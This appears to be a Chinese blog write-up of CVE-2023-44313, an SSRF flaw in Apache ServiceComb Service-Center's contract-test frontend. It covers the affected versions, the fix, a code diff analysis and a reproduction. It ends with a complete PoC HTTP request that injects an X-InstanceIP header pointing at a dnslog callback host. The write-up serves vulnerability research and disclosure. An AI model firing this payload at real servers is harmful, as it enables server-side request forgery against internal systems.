CVE-2023-44313 Apache ServiceComb Service-Center SSRF 漏洞研究

本次项目基于go语言(本人不精通),虽不是java web框架了 ,但搭建web服务的框架一些思想理念却是通用的,我们由此可以得到一些蛛丝马迹.......

目录

漏洞简介

漏洞分析

漏洞复现


漏洞简介

Apache ServiceComb Service-Center是Apache基金会的 一个基于 Restful 的服务注册中心,提供微服务发现和微服务管理。

在 ServiceComb Service-Center 中的 frontend 组件的契约测试功能存在SSRF漏洞,由于未验证请求instanceIP 参数,攻击者可构造恶意请求获取敏感服务器信息。

影响范围

Apache ServiceComb Service-Center < 2.2.0

安全版本

Apache ServiceComb Service-Center 2.2.0

解决建议

升级至安全版本及其以上

项目地址

GitHub - apache/servicecomb-service-center at a0e09e1f70e818d0bbc13f43238a876279808049

漏洞分析

定位文件frontend/schema/schemahandler.go

diff 比对修改添加的地方

两个版本都从header头中提取了参数 X-InstanceIP拼接http作为url,【左:2.1.0 右:2.2.0】

最后请求了该url,区别在于2.2.0版本 对X-InstanceIP做了函数检查。那这一定是漏洞触发点!

接下来思考! 如何进入路由处理函数?

搜索关键字 SchemaHandleFunc 寻找定义路由的地方

点进去查看

没错了就是我们想要的定义 现在开始构造payload进行漏洞复现

漏洞复现

下载源码 服务开起来

开启burp访问testSchema 路径 抓包

增加头部信息,打dnslog验证

X-InstanceIP: xxxx.dnslog.cn

查看dnslog状态

漏洞验证成功

参考阿里云漏洞库

附赠poc

复制代码
GET /testSchema/ HTTP/1.1
Host: 127.0.0.1:30103
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="119", "Not?A_Brand";v="24"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.105 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
X-InstanceIP: p5pcss.dnslog.cn
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
复制代码
相关推荐
bdgtd881786 小时前
动态修补C扩展模块的函数指针有哪些风险?安全的修补方案是什么?
c语言·开发语言·安全
深耕云原生6 小时前
Kubernetes 深入浅出系列 | 容器剖析之容器安全
安全·容器·kubernetes
bkspiderx6 小时前
安全扫描:目标主机支持RSA密钥交换问题
网络·nginx·安全·tls·rsa·弱算法
FreeBuf_7 小时前
Chrome高危零日漏洞PoC公开,已被用于野外攻击
linux·运维·服务器·安全·web安全
岁忧9 小时前
(LeetCode 每日一题) 498. 对角线遍历 (矩阵、模拟)
java·c++·算法·leetcode·矩阵·go
测试专家9 小时前
ARINC 825板卡的应用
大数据·网络·安全
狼爷12 小时前
Go 语言中的 Option 模式,让你写出可扩展性好的代码
go
奶油话梅糖13 小时前
深入解析交换机端口安全:Sticky MAC的工作原理与应用实践
网络·安全·macos
TGC达成共识15 小时前
解锁处暑健康生活
人工智能·科技·其他·安全·生活·美食·风景
jokr_15 小时前
C++ STL 顶层设计与安全:迭代器、失效与线程安全
java·c++·安全